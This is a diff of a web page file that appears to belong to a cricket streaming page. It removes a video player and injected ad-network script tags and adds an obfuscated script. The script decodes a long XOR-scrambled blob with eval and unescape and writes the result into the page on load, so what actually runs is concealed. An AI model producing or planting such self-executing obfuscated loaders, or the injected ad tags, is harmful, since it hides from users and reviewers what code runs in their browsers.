--- a/en.html
+++ b/en.html
@@ -1,63 +1,16 @@
-<meta name="propeller" content="10020ec6e0fe37d1332ec9cb369fc69e">
+<html>
+<head>
+</head>
+<body>
 
-<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',4987922,document.body||document.documentElement)</script>
-<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',4987926,document.body||document.documentElement)</script><script type="text/javascript" src="https://cdn.jsdelivr.net/clappr/latest/clappr.min.js"></script>
- <div class="theoplayer-container video-js theoplayer-skin vjs-16-9" data-src="https://diokz91u21fy1.cloudfront.net/iplch1/2022/master.m3u8" data-poster="https://i.ibb.co/j3y22wv/images-2022-03-31-T205713-252.jpg"></div>
-<script>
-  var element, player;
-
-  function createPlayer() {
-    element = document.querySelector('.theoplayer-container');
-    player = new THEOplayer.Player(element, {
-      libraryLocation: 'https://cdn.myth.theoplayer.com/55d71743-4924-4d1b-8440-78f9cd103879/'
-    });
-    player.preload = "auto";
-  }
-
-  function setSrc(src, poster) {
-    if (!player) {
-      createPlayer();
-    }
-    player.source = {
-      "sources": {
-        "src": src
-      },
-      "poster": poster
-    }
-  }
-  window.addEventListener('theoplayerready', function() {
-    if (!player) {
-      createPlayer();
-    }
-  })
-  document.addEventListener("DOMContentLoaded", function() {
-    var players = [].slice.call(document.querySelectorAll(".theoplayer-container"));
-    if ("IntersectionObserver" in window) {
-      var playerObserver = new IntersectionObserver(function(entries, observer) {
-        entries.forEach(function(container) {
-          if (container.isIntersecting) {
-            var src = container.target.dataset.src
-            var poster = container.target.dataset.poster;
-            if (!window.THEOplayer) {
-              window.addEventListener('theoplayerready',
-                function() {
-                  setSrc(src, poster);
-                })
-            } else {
-              setSrc(src, poster);
-            }
-            playerObserver.unobserve(container.target);
-          }
-        });
-      });
-      players.forEach(function(playerElement) {
-        playerObserver.observe(playerElement);
-      });
-    }
-  });
+<script type="text/javascript">
+<!-- 
+eval(unescape('%66%75%6e%63%74%69%6f%6e%20%68%62%66%38%32%66%39%64%36%61%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%34%33%35%35%39%32%38%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%36%31%34%31%37%37%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%35%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
+eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%68%62%66%38%32%66%39%64%36%61%28%27') + '%30%69%68%66%5d%1d%68%5a%69%64%39%1a%6c%6a%6b%63%69%66%61%61%6b%1c%1f%5f%6d%6e%68%61%61%66%39%1b%2d%2d%2a%29%2a%67%59%36%61%23%68%61%28%33%59%2d%2a%2f%2a%67%59%35%56%54%2f%37%35%67%5f%35%35%67%1a%3e%09%0d%01%04%31%6f%58%6c%60%6a%68%3e%24%60%78%60%5f%69%65%6c%68%27%6f%20%77%20%74%2f%62%25%70%6f%2f%6f%69%5f%3f%77%20%6f%21%67%61%69%3d%69%6e%69%65%5a%77%68%61%2b%2b%5e%5a%6e%5a%29%71%6b%6e%67%25%26%7d%2d%26%6d%28%5a%6a%6f%61%6e%58%39%62%6c%6e%5e%25%6f%22%37%7c%25%24%58%6d%5f%78%61%61%6f%6e%2f%5f%69%61%5b%68%67%41%6f%69%69%66%68%69%22%26%6f%59%6a%63%6a%67%2b%25%21%23%65%6e%6b%6a%69%32%2d%2b%6c%57%66%62%5f%60%5f%5b%68%2e%59%6d%69%22%66%5d%64%28%6e%65%6d%28%62%69%25%26%27%3d%32%34%35%2b%2c%23%5e%6d%59%77%69%68%60%6e%2f%5c%6c%5e%70%76%70%58%6d%5f%78%61%61%6f%6e%2f%5e%6e%5f%77%6f%67%68%67%49%66%66%69%66%68%6b%25%30%2d%69%5f%65%6d%6a%69%38%0e%04%33%6f%59%6a%63%6a%67%30%22%67%71%6f%5f%6b%65%6d%6e%24%6f%2f%79%26%73%26%6d%25%72%6f%2e%69%6a%5f%30%79%26%68%28%68%61%6b%3d%68%68%6a%65%55%79%6e%66%22%24%5e%58%6e%5b%2f%72%6b%61%69%23%21%74%22%26%6f%28%5b%6c%6c%61%61%56%3f%65%65%61%5e%27%6f%23%31%7f%25%2b%56%6b%58%71%6e%61%6d%6e%2e%59%6a%61%54%66%61%46%66%66%69%64%68%68%24%25%6f%56%64%65%6d%6e%24%25%23%23%64%68%68%6a%66%3c%2b%2c%65%58%66%60%5f%61%59%58%68%21%57%6b%6e%2b%69%5d%66%28%6f%63%6e%28%6d%67%23%21%2e%32%32%36%35%2a%36%20%5e%62%57%71%6e%61%6f%6e%2d%5c%6d%58%73%76%7f%56%6b%58%71%6e%61%6d%6e%2e%58%6d%5f%78%61%61%6f%6e%46%66%64%69%67%6e%68%25%3f%23%6f%58%6c%62%6a%6b%38%30%69%59%6c%6c%62%6e%1d%6e%72%6a%64%39%1a%68%67%72%67%23%64%5a%70%5a%6f%5a%6c%63%6c%68%1c%13%67%6c%58%39%1b%62%6b%6e%6c%69%32%2b%22%57%5e%6f%28%63%6f%5b%61%60%63%76%6c%21%60%61%69%2b%58%66%58%6a%6c%6a%2d%66%54%66%61%68%6e%2c%5f%63%5d%6c%6c%6a%28%60%6d%68%2f%64%68%1c%3d%36%2d%69%59%6c%6c%62%6e%3f%09%03%1a%33%5e%63%76%1c%5f%6f%55%6f%68%39%1b%6e%67%61%6d%6c%60%5d%7c%69%6c%2e%5f%6c%68%6b%5d%63%6e%67%6c%13%78%65%59%61%6c%29%61%6f%1c%68%64%61%62%62%66%5a%75%66%6c%2c%6f%61%63%6e%1a%79%6c%6f%2e%2d%37%29%30%1c%1c%58%5b%6e%54%21%6f%6b%5f%3e%1c%67%6e%68%6c%69%34%22%23%5e%62%6b%60%74%30%2d%77%2a%2b%60%7c%25%28%58%66%6c%71%5b%60%6a%6d%6e%6e%21%60%61%69%2b%62%6a%63%5f%64%2b%2d%2c%23%24%2c%2c%69%5a%6f%6b%61%6a%2e%6f%2f%78%3a%1c%1d%5e%5a%6e%58%29%6c%6d%69%6e%68%64%39%1b%62%69%6e%6f%6f%32%2d%2d%65%21%6d%5c%5b%28%58%6b%2e%64%29%73%2a%2c%7a%78%2b%62%69%5a%63%64%6f%2f%2a%2c%2c%25%21%2a%28%29%28%2d%2c%4e%2a%2c%37%33%24%27%29%2b%31%2b%28%61%6a%65%1a%3e%36%22%56%65%77%38%0e%04%33%6f%59%6a%63%6a%67%30%09%03%1a%1d%70%58%6c%1c%67%60%61%60%69%68%69%26%1d%6a%63%5d%73%67%6a%37%00%0c%09%03%1a%1d%60%74%68%59%68%63%6b%61%12%5f%6b%61%5a%6e%64%4a%60%5b%73%61%65%2a%25%1d%77%0e%04%1f%1a%1c%1c%67%66%68%61%61%6f%6e%1d%39%1f%5e%6d%59%77%69%68%60%6e%2f%6d%76%61%69%75%49%67%60%61%56%66%6b%6b%22%24%28%6b%62%67%6d%6c%66%54%7d%61%6b%29%58%6b%6d%6e%5b%63%6e%61%65%2b%25%30%09%03%1a%1f%1a%1c%6c%60%5d%7c%69%6c%1d%39%1d%68%64%73%1c%48%44%41%42%62%66%5a%75%66%6c%2d%4a%60%5b%73%61%65%2a%61%61%61%6e%61%6d%6e%20%1c%71%09%0d%12%1a%1d%1a%1d%1a%63%65%5a%6a%5b%6c%7c%4e%6b%58%5d%69%65%6e%68%32%1c%25%62%67%66%6a%68%34%2c%2b%5a%5e%6e%2e%6f%75%67%6a%28%69%62%66%6b%6f%66%5b%73%67%6c%21%57%6b%6e%2b%36%31%5b%33%2b%35%28%2f%20%26%35%2b%2e%2e%2e%5b%2d%5a%2f%34%2e%27%22%29%34%32%67%35%5a%5e%2b%2c%29%32%3a%3d%2b%24%09%03%1a%1f%1a%1c%7f%23%37%00%0c%1a%1d%1a%1d%6a%63%5d%73%67%6a%28%63%64%61%61%6b%5a%5e%1f%39%1c%1a%5b%71%67%63%1c%30%09%03%1a%1f%79%0f%02%0f%04%13%12%60%76%68%58%6e%60%6b%6e%1c%69%61%67%47%6c%58%22%68%6c%5a%26%1c%6c%6d%6f%67%69%6c%22%1a%70%09%01%1a%1c%1c%1c%65%69%12%22%1a%6a%61%5d%70%61%6a%23%1c%77%00%0c%1a%1d%1a%1d%1a%1f%5f%6a%67%5b%6e%68%42%66%5a%75%66%6c%27%25%31%0f%02%1a%13%12%1a%7e%09%03%1a%1f%1a%1c%6c%60%5d%7c%69%6c%2f%6f%6c%71%69%5f%67%1c%3f%1a%7e%01%04%1d%1a%1d%1a%1f%1a%1a%69%6d%71%65%57%61%68%1c%33%1a%72%09%02%1c%1c%1a%13%12%1a%1d%1a%1b%6f%69%5f%1a%32%1c%6f%65%57%09%03%1a%1d%1a%1f%1a%1c%7f%20%09%0d%12%1a%1d%1a%1d%1a%19%6a%6d%69%68%61%65%14%34%1d%6a%6c%6f%6b%61%6a%0f%02%1a%13%12%1a%7e%09%03%1a%1f%79%0f%02%1c%1a%7a%6d%68%59%6b%74%28%58%5e%58%47%76%61%61%66%46%62%6f%69%61%6d%61%6a%24%25%6e%6b%69%6b%6d%66%5a%75%64%6c%6a%67%5b%5e%7c%2b%26%1d%60%76%68%5a%6e%63%6d%6e%22%2c%12%77%0e%04%1d%1a%1f%1a%63%66%1c%22%14%62%66%5a%75%66%6c%20%1a%71%0f%02%1a%13%12%1a%1d%1a%58%6c%64%5d%68%67%4c%66%54%7d%61%6b%22%22%37%0c%04%1c%1c%1c%1a%70%01%04%1d%1a%7e%25%0c%04%1c%1c%58%6b%56%79%69%66%68%69%28%58%5e%58%47%76%61%61%66%46%62%6f%69%61%6d%61%6a%24%1a%3e%42%41%3f%6c%68%69%61%6d%6e%40%6d%5b%5e%68%56%1c%21%1a%67%71%6d%5f%68%63%6d%68%2b%2d%1a%70%09%03%1a%1f%1a%1c%76%5b%6c%13%62%66%5a%75%66%6c%6a%1a%3f%1c%51%59%21%67%66%62%5f%66%28%5a%5d%60%60%24%5e%62%57%71%6e%61%6f%6e%2d%6d%77%67%6a%75%46%69%66%66%5f%69%6b%69%3d%60%60%24%1c%21%66%62%66%6b%6d%66%58%75%67%6a%2f%5f%62%60%6e%5a%65%6f%61%69%1c%23%23%31%09%0d%12%1a%1d%1a%62%60%1f%22%1a%43%6e%6e%68%64%6f%66%5f%69%65%6e%68%4d%5a%69%61%65%78%61%6b%1c%1d%65%6d%1a%75%63%6e%5e%62%7b%25%1d%77%0e%04%1f%1a%1c%1c%1c%1a%79%55%6c%1d%6a%61%5d%70%61%6a%4d%5a%6f%68%64%70%66%6c%1d%39%1f%68%67%75%1c%45%61%66%61%6b%6f%66%5f%6b%65%6d%6e%4d%5c%66%69%6c%77%61%6b%22%65%71%6e%59%68%65%62%60%22%66%68%69%6c%60%61%69%20%1c%6b%55%67%61%6b%70%66%6c%20%1a%71%0f%02%1a%13%12%1a%1d%1a%1d%1a%64%68%68%6a%63%61%66%20%60%6c%6c%46%5d%5a%62%24%66%77%68%56%66%65%6c%68%25%5f%6e%68%68%5b%63%68%68%64%25%1d%77%0e%04%1f%1a%1c%1c%1c%1a%13%12%1a%1d%65%67%1a%27%5f%6d%6e%68%5d%6c%60%61%6b%28%62%6f%40%68%68%67%6a%6f%68%57%6e%62%68%64%25%1f%77%0f%02%1c%1a%13%12%1a%1d%1a%1d%1a%1f%1a%1c%76%5b%6c%13%67%6c%58%1a%3e%1a%5a%6b%6e%68%5b%65%61%69%6c%2f%6e%5a%6c%66%61%68%2e%58%5d%67%55%6f%66%6e%2f%6f%69%5f%0f%02%1c%1a%13%12%1a%1d%1a%1d%1a%1f%1a%1c%76%5b%6c%13%62%6b%68%6e%66%6c%1f%39%1c%59%6d%68%67%55%65%6f%61%6b%28%6b%5d%6a%65%67%6e%21%56%5d%69%5d%68%61%6b%28%6c%6d%69%6e%68%64%37%0e%04%1d%1a%1f%1a%1c%1c%1c%1a%13%12%1a%1d%65%67%1a%27%1d%75%63%6e%5e%62%7b%28%49%42%46%4b%6f%66%5b%73%67%6c%2c%12%77%0e%04%1d%1a%1f%1a%1c%1c%1c%1a%13%12%1a%1d%1a%1d%73%60%68%58%6d%75%28%54%56%5e%46%70%66%68%6b%46%63%69%68%61%61%69%6c%25%23%69%62%64%6b%6c%60%5b%75%68%64%6c%66%5d%59%75%26%26%0f%02%1c%1a%13%12%1a%1d%1a%1d%1a%1f%1a%1c%1c%1c%1a%13%68%71%6f%5f%69%65%6e%68%24%23%1c%77%00%0c%1a%1d%1a%1d%1a%1f%1a%1c%1c%1c%1a%13%12%1a%1d%1a%1d%1a%6a%61%68%49%6a%5f%2b%67%6c%58%26%1d%6a%6e%6f%68%67%6a%25%3e%01%04%1d%1a%1d%1a%1f%1a%1c%1c%1c%1a%13%12%1a%1d%1a%1d%79%20%09%02%1c%1c%1a%13%12%1a%1d%1a%1d%1a%1f%1a%7f%1c%67%66%66%69%1a%70%09%03%1a%1f%1a%1c%1c%1c%1a%13%12%1a%1d%1a%1d%1a%6a%61%68%49%6a%5f%2b%67%6c%58%26%1d%6a%6e%6f%68%67%6a%25%3e%01%04%1d%1a%1d%1a%1f%1a%1c%1c%1c%1a%13%12%79%0e%04%1d%1a%1f%1a%1c%1c%1c%1a%13%12%1a%1d%6a%61%5d%70%61%6a%4d%5a%6f%68%64%70%66%6c%2f%71%6d%6b%5a%69%67%6c%79%69%22%58%6b%6f%6e%58%65%6e%67%6a%28%67%55%6c%64%61%69%25%32%09%02%1c%1c%1a%13%12%1a%1d%1a%1d%1a%7c%09%02%1c%1c%1a%13%12%1a%1d%1a%7e%25%32%09%02%1c%1c%1a%13%12%1a%7e%25%30%09%01%1a%1c%1c%1c%1a%13%62%66%5a%75%66%6c%6a%28%66%6d%6a%41%54%57%62%25%60%76%68%5a%6e%63%6d%6e%22%63%6e%5d%72%61%6b%41%63%61%6f%67%6e%6e%2c%12%77%0e%04%1d%1a%1f%1a%1c%1c%1c%1a%63%6e%5d%72%61%6b%4b%59%6f%67%6a%76%61%65%20%6b%5b%6f%66%6c%75%61%24%6c%60%5d%7c%69%6c%46%66%66%69%64%68%68%23%31%09%0d%12%1a%1d%1a%1d%1a%7c%25%31%0f%02%1a%13%12%1a%7e%09%03%1a%1f%79%23%31%0f%04%3f%23%6f%58%6c%62%6a%6b%38%0f%02%30%6f%56%64%65%6d%6e%1d%5d%6a%75%6e%59%1c%6f%65%57%39%1b%62%69%6e%6f%6f%32%2d%2d%5f%57%60%28%6e%75%69%62%2d%6e%64%67%6d%6a%6f%55%75%66%6c%2f%5f%6e%69%2d%37%37%5e%3a%25%33%29%2f%2e%2e%30%2c%28%2f%28%5e%24%54%29%35%2e%29%2a%2c%33%34%66%33%5f%57%25%2a%28%32%34%35%2e%4e%44%47%4d%6a%6f%55%75%66%6c%2f%64%6a%1c%3e%30%2d%6f%56%64%65%6d%6e%3f%09%01%36%60%63%6e%67%13%64%61%61%39%1b%6f%6b%75%60%67%69%62%68%69%6e%1b%1a%69%75%6f%61%3f%1a%68%61%7b%66%2b%58%6f%68%1c%1f%62%6a%67%66%39%2a%6a%6e%69%6a%68%34%2e%2b%59%58%6e%28%60%7d%6e%65%28%69%62%64%6b%6c%60%5b%75%68%64%28%58%6b%6e%2b%34%31%58%35%2b%33%27%27%29%29%35%2b%2e%2c%2e%58%2b%5a%29%3b%26%2e%2d%29%34%32%65%35%59%58%2b%2a%26%3a%33%32%2b%76%65%2d%5f%69%69%25%38%00%0c%09%03%36%68%5f%69%65%6c%68%3e%22%69%79%68%58%6e%62%6b%6d%22%69%20%77%26%7d%2e%6a%22%77%68%28%6a%6c%59%3f%77%26%66%20%6f%66%6e%3a%6e%6b%6c%63%5a%77%6e%68%2a%23%59%5d%69%5d%2c%74%6d%6e%67%23%2f%7c%25%21%6a%2f%5d%6f%6a%67%6e%58%3f%6b%6d%66%59%22%68%25%32%79%23%24%58%6b%56%79%69%66%68%69%28%5a%6c%67%5b%68%61%48%6e%61%6e%61%6f%6e%27%23%69%59%6a%65%63%66%23%22%26%24%62%6b%6e%6c%69%32%2b%22%6d%5f%61%65%58%67%5a%5e%6e%2e%59%6b%60%23%6e%5a%63%2f%69%60%68%2e%62%69%23%2f%26%35%35%33%32%2c%35%26%58%6d%59%71%60%69%68%69%28%5b%6b%5b%75%70%70%58%6b%56%79%69%66%68%69%28%5b%6b%59%77%6f%61%61%66%41%61%61%6e%61%6d%6e%23%30%2d%6f%56%64%65%6d%6e%3f14355928%37%31%38%39%31%36%31' + unescape('%27%29%29%3b'));
+// -->
 </script>
-<script async src="https://cdn.myth.theoplayer.com/55d71743-4924-4d1b-8440-78f9cd103879/THEOplayer.js"></script>
-<link rel="stylesheet" type="text/css" href='https://cdn.myth.theoplayer.com/55d71743-4924-4d1b-8440-78f9cd103879/ui.css'>
+<noscript><i>Javascript required</i></noscript>
 
-<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',4987926,document.body||document.documentElement)</script>
+</body>
+</html>
 
